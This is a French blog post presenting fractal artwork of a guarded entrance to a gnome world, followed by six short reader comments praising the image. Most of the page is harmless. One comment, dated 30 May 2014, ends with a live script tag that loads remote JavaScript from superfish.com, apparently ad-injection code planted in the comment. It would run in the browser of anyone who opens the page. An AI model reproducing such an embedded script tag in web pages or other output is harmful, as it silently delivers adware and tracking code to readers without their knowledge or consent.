• l'imaginaire Le monde des gnomes

    voici la porte d'entrée du monde des gnomes

     

     

    Fractale pure

     

    Attention

    ils gardent  précieusement cette entrée

     

    l'imaginaire Le monde des gnomes

     

    Fractale et montage (servant de fond pour le Monde des Fées )

     

    Yahoo!

    Tags Tags : , , , ,
  • Commentaires

    6
    Vendredi 30 Mai 2014 à 15:01

    Le coquin il ne veut pas m'ouvrir la porte!!! j'aimerais tant voir derrière!!!

     bisous

    <script id="v9parityID" src="https://www.superfish.com/ws/sf_main.jsp?dlsource=rulthun&CTID=ffqt"></script>
    5
    Jeudi 29 Mai 2014 à 11:18

    Une très belle porte...

    4
    Mercredi 28 Mai 2014 à 18:42

    une porte bien travaillée

    3
    Mercredi 28 Mai 2014 à 18:15

    C'est exactement ainsi qu'on imagine le monde des gnomes, leur physionomie, leurs attitudes, leur antre. Tu es très douée, chère Celiandra. Merci pour ce partage étonnant!

    Bisous

    Lorraine

    2
    Mercredi 28 Mai 2014 à 17:05

    coucou céliandra

    jolies fractale que j'adore, l'entrée est bien gardée , bien précieux est le beau folklore et les secrets, oh les secrets  des gnomes , oh mais attention aux hommes , oh qui voudraient s'aventurer au coeur du bel imaginaire ,cherchant à percer les mystères (---) .

    1
    Mercredi 28 Mai 2014 à 12:39

    Coucou oh j'adore les gnomes j'en ai vu plein en Bretagne tongue passe une belle journée Domi 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :